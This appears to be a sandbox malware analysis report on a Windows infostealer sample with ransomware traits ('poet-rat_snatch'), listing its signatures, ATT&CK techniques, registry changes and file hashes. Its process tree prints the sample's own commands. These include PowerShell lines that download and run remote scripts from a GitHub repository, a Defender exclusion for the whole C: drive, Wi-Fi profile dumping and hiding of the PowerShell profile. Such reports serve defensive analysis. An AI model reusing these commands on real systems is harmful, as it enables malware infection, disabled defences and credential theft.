b1722e1e2bed853593c0d32777593a352901f7d4f670bd06dc0af4b9937da2d7

Resubmissions

18/08/2024, 23:39

240818-3nplcavclq 10

18/08/2024, 23:37

240818-3maqss1ekg 10

18/08/2024, 23:21

240818-3b7w6atekq 10

Analysis

max time kernel
144s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
18/08/2024, 23:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe
Size

14.0MB
MD5

221cb4b58df385e30145f2cda2423c66
SHA1

d16756fb4a42d8d32b72f71cd7d2ad20b073d511
SHA256

b1722e1e2bed853593c0d32777593a352901f7d4f670bd06dc0af4b9937da2d7
SHA512

0bf2e7e714b40706f078210229601f8d6ceeebcf8a89ba123aa38aa3c7b1b493911916cc54ed657bf4bcf8d2a8b6ab4da09148d64000d98bcdcad23aadf00b9c
SSDEEP

196608:5sWQx346uoeXYk8TmIhI0bQ+ko9gvK9aXFFT:52xooKZ8TmsI00+kzvfz

Score

9^/10

credential_access discovery evasion execution persistence privilege_escalation ransomware spyware stealer

Malware Config

Signatures

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 2 IoCs

flow	pid	Process
13	2820	powershell.exe
18	412	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2336	powershell.exe
2820	powershell.exe
412	powershell.exe
2144	PowerShell.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4272	netsh.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
18	raw.githubusercontent.com
11	raw.githubusercontent.com
13	raw.githubusercontent.com

Network Service Discovery 1 TTPs 1 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
3464	ARP.EXE

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Thunder_Kitty.jpg"	2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1784	netsh.exe
2568	netsh.exe

System Network Connections Discovery 1 TTPs 1 IoCs

Attempt to get a listing of network connections.

discovery

System Network Connections Discovery

T1049

pid	Process
4964	NETSTAT.EXE

Gathers network information 2 TTPs 3 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
5016	ipconfig.exe
4964	NETSTAT.EXE
4312	ipconfig.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
5032	taskkill.exe

Modifies Control Panel 2 IoCs

evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\Desktop\TileWallpaper = "0"	2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\Desktop\WallpaperStyle = "2"	2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
2336	powershell.exe
2820	powershell.exe
412	powershell.exe
2336	powershell.exe
2820	powershell.exe
2144	PowerShell.exe
412	powershell.exe
2144	PowerShell.exe
412	powershell.exe
412	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2336	powershell.exe
Token: SeDebugPrivilege	2820	powershell.exe
Token: SeDebugPrivilege	412	powershell.exe
Token: SeDebugPrivilege	2144	PowerShell.exe
Token: SeDebugPrivilege	5032	taskkill.exe
Token: 33	2832	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2832	AUDIODG.EXE
Token: SeIncreaseQuotaPrivilege	412	powershell.exe
Token: SeSecurityPrivilege	412	powershell.exe
Token: SeTakeOwnershipPrivilege	412	powershell.exe
Token: SeLoadDriverPrivilege	412	powershell.exe
Token: SeSystemProfilePrivilege	412	powershell.exe
Token: SeSystemtimePrivilege	412	powershell.exe
Token: SeProfSingleProcessPrivilege	412	powershell.exe
Token: SeIncBasePriorityPrivilege	412	powershell.exe
Token: SeCreatePagefilePrivilege	412	powershell.exe
Token: SeBackupPrivilege	412	powershell.exe
Token: SeRestorePrivilege	412	powershell.exe
Token: SeShutdownPrivilege	412	powershell.exe
Token: SeDebugPrivilege	412	powershell.exe
Token: SeSystemEnvironmentPrivilege	412	powershell.exe
Token: SeRemoteShutdownPrivilege	412	powershell.exe
Token: SeUndockPrivilege	412	powershell.exe
Token: SeManageVolumePrivilege	412	powershell.exe
Token: 33	412	powershell.exe
Token: 34	412	powershell.exe
Token: 35	412	powershell.exe
Token: 36	412	powershell.exe
Token: SeIncreaseQuotaPrivilege	412	powershell.exe
Token: SeSecurityPrivilege	412	powershell.exe
Token: SeTakeOwnershipPrivilege	412	powershell.exe
Token: SeLoadDriverPrivilege	412	powershell.exe
Token: SeSystemProfilePrivilege	412	powershell.exe
Token: SeSystemtimePrivilege	412	powershell.exe
Token: SeProfSingleProcessPrivilege	412	powershell.exe
Token: SeIncBasePriorityPrivilege	412	powershell.exe
Token: SeCreatePagefilePrivilege	412	powershell.exe
Token: SeBackupPrivilege	412	powershell.exe
Token: SeRestorePrivilege	412	powershell.exe
Token: SeShutdownPrivilege	412	powershell.exe
Token: SeDebugPrivilege	412	powershell.exe
Token: SeSystemEnvironmentPrivilege	412	powershell.exe
Token: SeRemoteShutdownPrivilege	412	powershell.exe
Token: SeUndockPrivilege	412	powershell.exe
Token: SeManageVolumePrivilege	412	powershell.exe
Token: 33	412	powershell.exe
Token: 34	412	powershell.exe
Token: 35	412	powershell.exe
Token: 36	412	powershell.exe
Token: SeIncreaseQuotaPrivilege	412	powershell.exe
Token: SeSecurityPrivilege	412	powershell.exe
Token: SeTakeOwnershipPrivilege	412	powershell.exe
Token: SeLoadDriverPrivilege	412	powershell.exe
Token: SeSystemProfilePrivilege	412	powershell.exe
Token: SeSystemtimePrivilege	412	powershell.exe
Token: SeProfSingleProcessPrivilege	412	powershell.exe
Token: SeIncBasePriorityPrivilege	412	powershell.exe
Token: SeCreatePagefilePrivilege	412	powershell.exe
Token: SeBackupPrivilege	412	powershell.exe
Token: SeRestorePrivilege	412	powershell.exe
Token: SeShutdownPrivilege	412	powershell.exe
Token: SeDebugPrivilege	412	powershell.exe
Token: SeSystemEnvironmentPrivilege	412	powershell.exe
Token: SeRemoteShutdownPrivilege	412	powershell.exe

Suspicious use of WriteProcessMemory 56 IoCs

description	pid	Process	procid_target
PID 1480 wrote to memory of 412	1480	2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe	85
PID 1480 wrote to memory of 412	1480	2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe	85
PID 1480 wrote to memory of 2820	1480	2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe	87
PID 1480 wrote to memory of 2820	1480	2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe	87
PID 1480 wrote to memory of 2336	1480	2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe	88
PID 1480 wrote to memory of 2336	1480	2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe	88
PID 1480 wrote to memory of 4352	1480	2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe	89
PID 1480 wrote to memory of 4352	1480	2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe	89
PID 1480 wrote to memory of 4272	1480	2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe	90
PID 1480 wrote to memory of 4272	1480	2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe	90
PID 4272 wrote to memory of 448	4272	cmd.exe	91
PID 4272 wrote to memory of 448	4272	cmd.exe	91
PID 1480 wrote to memory of 2144	1480	2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe	92
PID 1480 wrote to memory of 2144	1480	2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe	92
PID 1480 wrote to memory of 2224	1480	2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe	93
PID 1480 wrote to memory of 2224	1480	2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe	93
PID 412 wrote to memory of 4732	412	powershell.exe	95
PID 412 wrote to memory of 4732	412	powershell.exe	95
PID 1480 wrote to memory of 5032	1480	2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe	97
PID 1480 wrote to memory of 5032	1480	2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe	97
PID 4732 wrote to memory of 2572	4732	csc.exe	100
PID 4732 wrote to memory of 2572	4732	csc.exe	100
PID 412 wrote to memory of 1784	412	powershell.exe	103
PID 412 wrote to memory of 1784	412	powershell.exe	103
PID 412 wrote to memory of 1892	412	powershell.exe	104
PID 412 wrote to memory of 1892	412	powershell.exe	104
PID 1892 wrote to memory of 1988	1892	net.exe	105
PID 1892 wrote to memory of 1988	1892	net.exe	105
PID 412 wrote to memory of 4272	412	powershell.exe	106
PID 412 wrote to memory of 4272	412	powershell.exe	106
PID 412 wrote to memory of 2340	412	powershell.exe	107
PID 412 wrote to memory of 2340	412	powershell.exe	107
PID 412 wrote to memory of 2624	412	powershell.exe	109
PID 412 wrote to memory of 2624	412	powershell.exe	109
PID 2624 wrote to memory of 636	2624	net.exe	110
PID 2624 wrote to memory of 636	2624	net.exe	110
PID 412 wrote to memory of 5016	412	powershell.exe	111
PID 412 wrote to memory of 5016	412	powershell.exe	111
PID 412 wrote to memory of 1800	412	powershell.exe	112
PID 412 wrote to memory of 1800	412	powershell.exe	112
PID 1800 wrote to memory of 4680	1800	net.exe	113
PID 1800 wrote to memory of 4680	1800	net.exe	113
PID 412 wrote to memory of 1632	412	powershell.exe	114
PID 412 wrote to memory of 1632	412	powershell.exe	114
PID 412 wrote to memory of 4964	412	powershell.exe	115
PID 412 wrote to memory of 4964	412	powershell.exe	115
PID 412 wrote to memory of 812	412	powershell.exe	116
PID 412 wrote to memory of 812	412	powershell.exe	116
PID 412 wrote to memory of 4312	412	powershell.exe	117
PID 412 wrote to memory of 4312	412	powershell.exe	117
PID 412 wrote to memory of 4200	412	powershell.exe	118
PID 412 wrote to memory of 4200	412	powershell.exe	118
PID 412 wrote to memory of 3464	412	powershell.exe	119
PID 412 wrote to memory of 3464	412	powershell.exe	119
PID 412 wrote to memory of 2568	412	powershell.exe	120
PID 412 wrote to memory of 2568	412	powershell.exe	120

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2224	attrib.exe

C:\Users\Admin\AppData\Local\Temp\2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe
"C:\Users\Admin\AppData\Local\Temp\2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe"
1⤵
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1480
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:412
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\elzdmbqi\elzdmbqi.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4732
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7D00.tmp" "c:\Users\Admin\AppData\Local\Temp\elzdmbqi\CSC24EAEF18646A4C07A2801F66A06B31A6.TMP"
      4⤵
      PID:2572
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profiles
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:1784
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup administrators
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1892
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup administrators
      4⤵
      PID:1988
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" advfirewall show allprofiles
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:4272
- - C:\Windows\system32\whoami.exe
    "C:\Windows\system32\whoami.exe" /all
    3⤵
    PID:2340
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" user
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2624
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user
      4⤵
      PID:636
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /displaydns
    3⤵
    - Gathers network information
    PID:5016
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1800
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup
      4⤵
      PID:4680
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" startup get command caption
    3⤵
    PID:1632
- - C:\Windows\system32\NETSTAT.EXE
    "C:\Windows\system32\NETSTAT.EXE" -ano
    3⤵
    - System Network Connections Discovery
    - Gathers network information
    PID:4964
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe
    3⤵
    PID:812
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /all
    3⤵
    - Gathers network information
    PID:4312
- - C:\Windows\system32\ROUTE.EXE
    "C:\Windows\system32\ROUTE.EXE" print
    3⤵
    PID:4200
- - C:\Windows\system32\ARP.EXE
    "C:\Windows\system32\ARP.EXE" -a
    3⤵
    - Network Service Discovery
    PID:3464
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profile
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:2568
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2820
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -C "Add-MpPreference -ExclusionPath 'C:'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2336
- C:\Windows\system32\cmd.exe
  cmd.exe /c start facebook.com
  2⤵
  PID:4352
- C:\Windows\system32\cmd.exe
  cmd /c rundll32.exe user32.dll,SwapMouseButton
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4272
- - C:\Windows\system32\rundll32.exe
    rundll32.exe user32.dll,SwapMouseButton
    3⤵
    PID:448
- C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe
  PowerShell -Command "(New-Object -ComObject SAPI.SpVoice).Speak(\"hey hey\")"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2144
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
  2⤵
  - Views/modifies file attributes
  PID:2224
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM wallpaper32.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5032

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x510 0x528
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2832

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Permission Groups Discovery

T1069

Local Groups

T1069.001

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

System Network Connections Discovery

T1049

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
a43e653ffb5ab07940f4bdd9cc8fade4

SHA1
af43d04e3427f111b22dc891c5c7ee8a10ac4123

SHA256
c4c53abb13e99475aebfbe9fec7a8fead81c14c80d9dcc2b81375304f3a683fe

SHA512
62a97e95e1f19a8d4302847110dae44f469877eed6aa8ea22345c6eb25ee220e7d310fa0b7ec5df42356815421c0af7c46a0f1fee8933cc446641800eda6cd1b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2a92b632fd93f6bb122501c256f7a81c

SHA1
3be80f9f2c584b6981afe20553d2dbab8943fbb8

SHA256
2f1e4e265f2f12fb5f9b3e4b468a5eb73a2f6ae952e65a2b26c2a60f56846b4a

SHA512
